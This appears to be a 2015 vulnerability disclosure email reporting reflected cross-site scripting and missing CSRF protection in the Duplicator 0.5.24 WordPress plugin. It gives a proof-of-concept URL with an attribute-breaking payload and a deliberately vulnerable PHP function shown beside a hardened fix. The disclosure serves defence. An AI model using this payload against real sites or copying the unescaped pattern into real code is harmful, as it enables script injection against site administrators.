Subject: Cross-Site Scripting (XSS) in Duplicator 0.5.24
Date: Sat, 15 Aug 2015 14:03:10 +0200

Hello,

Plugin: Duplicator 0.5.24 https://wordpress.org/plugins/duplicator/

1. Cross-Site Scripting (XSS)

Authenticated administrators can inject HTML/JS code, and the request has no CSRF protection.

Method: GET
URL: http://localhost/wp-admin/admin.php?page=duplicator-tools&tab=logging&logname=[xss]
Vulnerable parameters: logname

Example PHP callstack:
/duplicator/views/tools/logging.php:158

Verification:
http://localhost/wp-admin/admin.php?page=duplicator-tools&tab=logging&logname=%22+onload%3Dalert%281%29+%3E
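The pattern behind this finding next to a hardened form, as an added example that is not the plugin's own code (the function names, the nonce action name and the log file location are assumptions; it assumes the WordPress `wp_*` helpers are loaded):

```php
<?php
// Added example (not Duplicator's code): a hypothetical reconstruction of the
// pattern the advisory describes, beside a hardened version. Assumes it runs
// inside a WordPress admin page, so the wp_* helpers are available.

// VULNERABLE: the GET parameter is reflected straight into an HTML attribute,
// so a value such as  " onload=alert(1) >  closes the attribute and adds one.
function dup_render_log_viewer_vulnerable() {
    $logname = isset($_GET['logname']) ? $_GET['logname'] : '';
    echo '<iframe src="' . $logname . '"></iframe>';
}

// HARDENED: require a nonce (CSRF), constrain the value, escape per context.
function dup_render_log_viewer_hardened() {
    // Links to this tab must be built with wp_nonce_url($url, 'dup_view_log');
    // check_admin_referer() stops the request if the nonce is absent or invalid.
    check_admin_referer('dup_view_log');   // 'dup_view_log' is a hypothetical action name

    $raw = isset($_GET['logname']) ? wp_unslash($_GET['logname']) : '';
    // Reduce the value to a plain file name: drops path separators and
    // control characters, so only a log file under the plugin's directory is named.
    $logname = sanitize_file_name($raw);
    if ($logname === '' || !preg_match('/\.log$/', $logname)) {
        wp_die('Invalid log name.');
    }

    // Escape for the exact output context: esc_url() for src, esc_html() for text.
    $src = plugins_url('logs/' . $logname, __FILE__);   // hypothetical log location
    echo '<p>Viewing ' . esc_html($logname) . '</p>';
    echo '<iframe src="' . esc_url($src) . '"></iframe>';
}
```

Both issues the advisory names are addressed: the nonce check refuses forged links, and the escaping keeps the reflected value inside the attribute.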

-- 
Regards,
Marcin Probola,